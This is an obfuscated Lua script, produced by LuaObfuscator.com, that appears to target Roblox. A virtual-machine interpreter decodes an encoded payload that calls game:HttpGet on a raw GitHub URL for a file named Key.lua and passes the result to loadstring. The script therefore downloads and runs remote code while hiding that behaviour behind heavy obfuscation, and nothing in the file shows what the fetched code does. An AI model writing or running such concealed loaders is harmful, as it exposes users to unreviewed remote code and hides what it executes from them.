--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.16) ~  Much Love, Ferib 

]]--

local v0 = tonumber;
local v1 = string.byte;
local v2 = string.char;
local v3 = string.sub;
local v4 = string.gsub;
local v5 = string.rep;
local v6 = table.concat;
local v7 = table.insert;
local v8 = math.ldexp;
local v9 = getfenv or function()
	return _ENV;
end;
local v10 = setmetatable;
local v11 = pcall;
local v12 = select;
local v13 = unpack or table.unpack;
local v14 = tonumber;
local function v15(v16, v17, ...)
	local v18 = 1;
	local v19;
	v16 = v4(v3(v16, 5), "..", function(v30)
		if (v1(v30, 2) == 79) then
			local v84 = 0;
			while true do
				if (v84 == 0) then
					v19 = v0(v3(v30, 1, 1));
					return "";
				end
			end
		else
			local v85 = v2(v0(v30, 16));
			if v19 then
				local v93 = 0;
				local v94;
				while true do
					if (v93 == 1) then
						return v94;
					end
					if (v93 == 0) then
						v94 = v5(v85, v19);
						v19 = nil;
						v93 = 1;
					end
				end
			else
				return v85;
			end
		end
	end);
	local function v20(v31, v32, v33)
		if v33 then
			local v86 = (v31 / ((5 - 3) ^ (v32 - (2 - (4 - 3))))) % ((3 - (118 - (32 + 85))) ^ (((v33 - (2 - 1)) - (v32 - (620 - (544 + 11 + 64)))) + 1 + 0 + 0));
			return v86 - (v86 % (1 - (957 - (892 + 65))));
		else
			local v87 = 931 - (857 + 74);
			local v88;
			while true do
				if (v87 == (568 - (367 + 201))) then
					v88 = 2 ^ (v32 - (1271 - (226 + 1044)));
					return (((v31 % (v88 + v88)) >= v88) and (928 - ((510 - 296) + 713))) or (0 - 0);
				end
			end
		end
	end
	local function v21()
		local v34 = 0;
		local v35;
		while true do
			if (v34 == ((0 + 0) - 0)) then
				v35 = v1(v16, v18, v18);
				v18 = v18 + (2 - 1);
				v34 = 351 - (87 + 263);
			end
			if (v34 == (181 - (50 + 17 + 113))) then
				return v35;
			end
		end
	end
	local function v22()
		local v36 = 0 - 0;
		local v37;
		local v38;
		while true do
			if (v36 == (952 - (802 + 150))) then
				v37, v38 = v1(v16, v18, v18 + (5 - 3));
				v18 = v18 + (3 - 1);
				v36 = 1 + 0 + 0;
			end
			if (v36 == (998 - (915 + 82))) then
				return (v38 * (724 - 468)) + v37;
			end
		end
	end
	local function v23()
		local v39, v40, v41, v42 = v1(v16, v18, v18 + (3 - 0));
		v18 = v18 + 4;
		return (v42 * 16777216) + (v41 * (66723 - (1069 + 118))) + (v40 * (580 - 324)) + v39;
	end
	local function v24()
		local v43 = 0;
		local v44;
		local v45;
		local v46;
		local v47;
		local v48;
		local v49;
		while true do
			if (v43 == (1 - 0)) then
				v46 = 1 + 0;
				v47 = (v20(v45, 1 - (885 - (261 + 624)), 20 + 0) * ((793 - (368 + 423)) ^ (100 - 68))) + v44;
				v43 = (35 - 15) - ((1090 - (1020 + 60)) + 8);
			end
			if (v43 == (11 - 8)) then
				if (v48 == (442 - (416 + (1449 - (630 + 793))))) then
					if (v47 == (0 - (0 - 0))) then
						return v49 * (0 + 0);
					else
						local v100 = 0 - 0;
						while true do
							if (v100 == 0) then
								v48 = 439 - (145 + 293);
								v46 = (2035 - 1605) - (44 + 386);
								break;
							end
						end
					end
				elseif (v48 == 2047) then
					return ((v47 == (1486 - (998 + 488))) and (v49 * ((1 + 0) / (0 + 0)))) or (v49 * NaN);
				end
				return v8(v49, v48 - (1795 - (201 + 571))) * (v46 + (v47 / ((1140 - (116 + 1022)) ^ 52)));
			end
			if ((0 - 0) == v43) then
				v44 = v23();
				v45 = v23();
				v43 = 1 + 0;
			end
			if (v43 == (7 - 5)) then
				v48 = v20(v45, 74 - 53, 13 + 18);
				v49 = ((v20(v45, 891 - (814 + 45)) == (2 - 1)) and -((3 - 2) + 0)) or (1 + 0);
				v43 = 1750 - (760 + 987);
			end
		end
	end
	local function v25(v50)
		local v51;
		if not v50 then
			local v89 = 1913 - (15 + 1774 + 124);
			while true do
				if (v89 == (766 - (745 + 21))) then
					v50 = v23();
					if (v50 == (0 + 0 + 0)) then
						return "";
					end
					break;
				end
			end
		end
		v51 = v3(v16, v18, (v18 + v50) - (2 - 1));
		v18 = v18 + v50;
		local v52 = {};
		for v68 = (1058 - (87 + 968)) - 2, #v51 do
			v52[v68] = v2(v1(v3(v51, v68, v68)));
		end
		return v6(v52);
	end
	local v26 = v23;
	local function v27(...)
		return {...}, v12("#", ...);
	end
	local function v28()
		local v53 = 0 - 0;
		local v54;
		local v55;
		local v56;
		local v57;
		local v58;
		local v59;
		local v60;
		local v61;
		while true do
			if (v53 ~= (2 + 1)) then
			else
				v60 = nil;
				v61 = nil;
				v53 = 1 + 3;
			end
			if (v53 == (2 - 1)) then
				v56 = nil;
				v57 = nil;
				v53 = 4 - 2;
			end
			if (v53 ~= 2) then
			else
				v58 = nil;
				v59 = nil;
				v53 = 1 + 2;
			end
			if (v53 ~= (0 - 0)) then
			else
				v54 = 1467 - (899 + 568);
				v55 = nil;
				v53 = 1 + 0;
			end
			if ((9 - 5) == v53) then
				while true do
					if (v54 == (604 - (268 + 335))) then
						local v99 = 0;
						while true do
							if ((1 + 0) ~= v99) then
							else
								v54 = 2;
								break;
							end
							if (v99 ~= (290 - (60 + 230))) then
							else
								v57 = nil;
								v58 = nil;
								v99 = 573 - (426 + 146);
							end
						end
					end
					if (v54 ~= 0) then
					else
						v55 = 1202 - (373 + 829);
						v56 = nil;
						v54 = 1 + 0;
					end
					if (v54 == 3) then
						v61 = nil;
						while true do
							local v101 = 731 - (476 + 255);
							while true do
								if (v101 == (1456 - (282 + 1174))) then
									if (v55 == (812 - (569 + 242))) then
										v60 = v23();
										v61 = {};
										for v137 = 1 - 0, v60 do
											local v138 = 0 - 0;
											local v139;
											local v140;
											local v141;
											local v142;
											while true do
												if (v138 == (2 - 1)) then
													v141 = nil;
													v142 = nil;
													v138 = 1 + 1;
												end
												if (v138 == (1 + 1)) then
													while true do
														if (v139 == 0) then
															local v159 = 1024 - (706 + 318);
															while true do
																if (v159 == (1252 - (721 + 530))) then
																	v139 = 337 - (144 + 192);
																	break;
																end
																if (v159 == (1271 - (945 + 326))) then
																	v140 = 0 - 0;
																	v141 = nil;
																	v159 = 1 + 0;
																end
															end
														end
														if (v139 == (1 + 0)) then
															v142 = nil;
															while true do
																if (v140 == 0) then
																	v141 = v21();
																	v142 = nil;
																	v140 = 701 - (271 + 429);
																end
																if (v140 ~= 1) then
																else
																	if (v141 == 1) then
																		v142 = v21() ~= 0;
																	elseif (v141 == 2) then
																		v142 = v24();
																	elseif (v141 == (3 + 0)) then
																		v142 = v25();
																	end
																	v61[v137] = v142;
																	break;
																end
															end
															break;
														end
													end
													break;
												end
												if (v138 ~= 0) then
												else
													v139 = 0 + 0;
													v140 = nil;
													v138 = 1;
												end
											end
										end
										v59[3] = v21();
										v55 = 1502 - (1408 + 92);
									end
									if (v55 ~= (1088 - (461 + 625))) then
									else
										local v133 = 1580 - (1183 + 397);
										local v134;
										while true do
											if (v133 == (1288 - (993 + 295))) then
												v134 = 0;
												while true do
													if (v134 == 0) then
														local v157 = 0;
														while true do
															if (v157 ~= (1 + 0)) then
															else
																v134 = 1172 - (418 + 753);
																break;
															end
															if (v157 ~= (0 + 0)) then
															else
																for v161 = 1 + 0, v23() do
																	local v162 = 0 + 0;
																	local v163;
																	local v164;
																	local v165;
																	while true do
																		if (v162 ~= (1 + 0)) then
																		else
																			v165 = nil;
																			while true do
																				if ((0 + 0) == v163) then
																					v164 = 0 + 0;
																					v165 = nil;
																					v163 = 2 - 1;
																				end
																				if (v163 ~= (1934 - (565 + 1368))) then
																				else
																					while true do
																						if (v164 == (0 - 0)) then
																							v165 = v21();
																							if (v20(v165, 1, 1662 - (1477 + 184)) ~= (529 - (406 + 123))) then
																							else
																								local v168 = 0 - 0;
																								local v169;
																								local v170;
																								local v171;
																								local v172;
																								local v173;
																								while true do
																									if ((1770 - (1749 + 20)) ~= v168) then
																									else
																										v171 = nil;
																										v172 = nil;
																										v168 = 2;
																									end
																									if (v168 ~= (0 + 0)) then
																									else
																										v169 = 0 - 0;
																										v170 = nil;
																										v168 = 1323 - (1249 + 73);
																									end
																									if (v168 == (1 + 1)) then
																										v173 = nil;
																										while true do
																											if (v169 ~= 2) then
																											else
																												while true do
																													if (v170 ~= (0 + 0)) then
																													else
																														v171 = v20(v165, 2, 1148 - (466 + 679));
																														v172 = v20(v165, 9 - 5, 17 - 11);
																														v170 = 1 + 0;
																													end
																													if (v170 == (1903 - (106 + 1794))) then
																														if (v20(v172, 1 + 2, 1 + 2) == 1) then
																															v173[4] = v61[v173[11 - 7]];
																														end
																														v56[v161] = v173;
																														break;
																													end
																													if (v170 == (5 - 3)) then
																														local v176 = 114 - (4 + 110);
																														local v177;
																														while true do
																															if (v176 == (584 - (57 + 527))) then
																																v177 = 0;
																																while true do
																																	if (v177 == (1428 - (41 + 1386))) then
																																		v170 = 3;
																																		break;
																																	end
																																	if (0 ~= v177) then
																																	else
																																		if (v20(v172, 104 - (17 + 86), 1) ~= 1) then
																																		else
																																			v173[2 + 0] = v61[v173[3 - 1]];
																																		end
																																		if (v20(v172, 2, 1140 - (782 + 356)) == 1) then
																																			v173[8 - 5] = v61[v173[169 - (122 + 44)]];
																																		end
																																		v177 = 1 - 0;
																																	end
																																end
																																break;
																															end
																														end
																													end
																													if ((1093 - (975 + 117)) == v170) then
																														local v178 = 1875 - (157 + 1718);
																														while true do
																															if (v178 ~= (3 - 2)) then
																															else
																																v170 = 2;
																																break;
																															end
																															if (v178 == (0 + 0)) then
																																v173 = {v22(),v22(),nil,nil};
																																if (v171 == (0 - 0)) then
																																	local v181 = 0;
																																	local v182;
																																	local v183;
																																	while true do
																																		if ((0 - 0) == v181) then
																																			v182 = 65 - (30 + 35);
																																			v183 = nil;
																																			v181 = 1 + 0;
																																		end
																																		if ((1258 - (1043 + 214)) == v181) then
																																			while true do
																																				if (v182 ~= 0) then
																																				else
																																					v183 = 0 - 0;
																																					while true do
																																						if (v183 == (0 - 0)) then
																																							v173[3] = v22();
																																							v173[1216 - (323 + 889)] = v22();
																																							break;
																																						end
																																					end
																																					break;
																																				end
																																			end
																																			break;
																																		end
																																	end
																																elseif (v171 == 1) then
																																	v173[3] = v23();
																																elseif (v171 == (4 - 2)) then
																																	v173[7 - 4] = v23() - ((582 - (361 + 219)) ^ (336 - (53 + 267)));
																																elseif (v171 == 3) then
																																	local v190 = 0 + 0;
																																	local v191;
																																	local v192;
																																	while true do
																																		if (v190 == (413 - (15 + 398))) then
																																			v191 = 982 - (18 + 964);
																																			v192 = nil;
																																			v190 = 1228 - (322 + 905);
																																		end
																																		if (v190 == (3 - 2)) then
																																			while true do
																																				if ((0 + 0) ~= v191) then
																																				else
																																					v192 = 1189 - (449 + 740);
																																					while true do
																																						if (v192 == (0 + 0)) then
																																							v173[853 - (20 + 830)] = v23() - (2 ^ (13 + 3));
																																							v173[12 - 8] = v22();
																																							break;
																																						end
																																					end
																																					break;
																																				end
																																			end
																																			break;
																																		end
																																	end
																																end
																																v178 = 127 - (116 + 10);
																															end
																														end
																													end
																												end
																												break;
																											end
																											if (v169 ~= (1 + 0)) then
																											else
																												local v174 = 1898 - (260 + 1638);
																												while true do
																													if (0 == v174) then
																														v172 = nil;
																														v173 = nil;
																														v174 = 1 + 0;
																													end
																													if (v174 == (739 - (542 + 196))) then
																														v169 = 6 - 4;
																														break;
																													end
																												end
																											end
																											if (v169 ~= 0) then
																											else
																												v170 = 0 + 0;
																												v171 = nil;
																												v169 = 1 - 0;
																											end
																										end
																										break;
																									end
																								end
																							end
																							break;
																						end
																					end
																					break;
																				end
																			end
																			break;
																		end
																		if (v162 ~= (0 + 0)) then
																		else
																			v163 = 0 + 0;
																			v164 = nil;
																			v162 = 1 + 0;
																		end
																	end
																end
																for v166 = 2 - 1, v23() do
																	v57[v166 - 1] = v28();
																end
																v157 = 2 - 1;
															end
														end
													end
													if ((1552 - (1126 + 425)) == v134) then
														return v59;
													end
												end
												break;
											end
										end
									end
									v101 = 1 + 0;
								end
								if (v101 ~= (406 - (118 + 287))) then
								else
									if ((0 - 0) == v55) then
										local v135 = 1121 - (118 + 1003);
										local v136;
										while true do
											if (v135 == (0 - 0)) then
												v136 = 377 - (142 + 235);
												while true do
													if (v136 == (684 - (483 + 200))) then
														local v158 = 0 - 0;
														while true do
															if (v158 == (0 + 0)) then
																v58 = {};
																v59 = {v56,v57,nil,v58};
																v158 = 1 + 0;
															end
															if ((1 - 0) == v158) then
																v136 = 2;
																break;
															end
														end
													end
													if (v136 ~= (0 + 0)) then
													else
														v56 = {};
														v57 = {};
														v136 = 1;
													end
													if ((2 + 0) == v136) then
														v55 = 563 - (334 + 228);
														break;
													end
												end
												break;
											end
										end
									end
									break;
								end
							end
						end
						break;
					end
					if (v54 == 2) then
						v59 = nil;
						v60 = nil;
						v54 = 2 + 1;
					end
				end
				break;
			end
		end
	end
	local function v29(v62, v63, v64)
		local v65 = v62[1];
		local v66 = v62[2];
		local v67 = v62[3];
		return function(...)
			local v70 = v65;
			local v71 = v66;
			local v72 = v67;
			local v73 = v27;
			local v74 = 1;
			local v75 = -1;
			local v76 = {};
			local v77 = {...};
			local v78 = v12("#", ...) - 1;
			local v79 = {};
			local v80 = {};
			for v90 = 0, v78 do
				if (v90 >= v72) then
					v76[v90 - v72] = v77[v90 + 1];
				else
					v80[v90] = v77[v90 + 1];
				end
			end
			local v81 = (v78 - v72) + 1;
			local v82;
			local v83;
			while true do
				v82 = v70[v74];
				v83 = v82[1];
				if (v83 <= 6) then
					if (v83 <= 2) then
						if (v83 <= 0) then
							local v102 = v82[2];
							v80[v102] = v80[v102](v13(v80, v102 + 1, v75));
						elseif (v83 == 1) then
							v80[v82[2]] = v82[3];
						else
							local v108 = 0;
							local v109;
							local v110;
							local v111;
							local v112;
							while true do
								if (v108 == 0) then
									v109 = v82[2];
									v110, v111 = v73(v80[v109](v13(v80, v109 + 1, v82[3])));
									v108 = 1;
								end
								if (v108 == 2) then
									for v150 = v109, v75 do
										v112 = v112 + 1;
										v80[v150] = v110[v112];
									end
									break;
								end
								if (v108 == 1) then
									v75 = (v111 + v109) - 1;
									v112 = 0;
									v108 = 2;
								end
							end
						end
					elseif (v83 <= 4) then
						if (v83 > 3) then
							local v113 = v82[2];
							local v114 = v80[v82[3]];
							v80[v113 + 1] = v114;
							v80[v113] = v114[v82[4]];
						else
							do
								return;
							end
						end
					elseif (v83 > 5) then
						v80[v82[2]] = v82[3];
					else
						v80[v82[2]] = v64[v82[3]];
					end
				elseif (v83 <= 9) then
					if (v83 <= 7) then
						local v104 = v82[2];
						v80[v104] = v80[v104](v13(v80, v104 + 1, v75));
					elseif (v83 == 8) then
						v80[v82[2]]();
					else
						v80[v82[2]] = v64[v82[3]];
					end
				elseif (v83 <= 11) then
					if (v83 == 10) then
						do
							return;
						end
					else
						local v124 = 0;
						local v125;
						local v126;
						local v127;
						local v128;
						while true do
							if (v124 == 1) then
								v75 = (v127 + v125) - 1;
								v128 = 0;
								v124 = 2;
							end
							if (v124 == 2) then
								for v153 = v125, v75 do
									local v154 = 0;
									while true do
										if (v154 == 0) then
											v128 = v128 + 1;
											v80[v153] = v126[v128];
											break;
										end
									end
								end
								break;
							end
							if (v124 == 0) then
								v125 = v82[2];
								v126, v127 = v73(v80[v125](v13(v80, v125 + 1, v82[3])));
								v124 = 1;
							end
						end
					end
				elseif (v83 > 12) then
					v80[v82[2]]();
				else
					local v129 = 0;
					local v130;
					local v131;
					while true do
						if (v129 == 1) then
							v80[v130 + 1] = v131;
							v80[v130] = v131[v82[4]];
							break;
						end
						if (v129 == 0) then
							v130 = v82[2];
							v131 = v80[v82[3]];
							v129 = 1;
						end
					end
				end
				v74 = v74 + 1;
			end
		end;
	end
	return v29(v28(), {}, v17)(...);
end
v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574033E3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F447261676F6E6B756E672F546573742F6D61696E2F4B65792E6C756100083O0012053O00013O001205000100023O002004000100010003001206000300044O0002000100034O00075O00022O00083O000100012O00033O00017O00", v9(), ...);
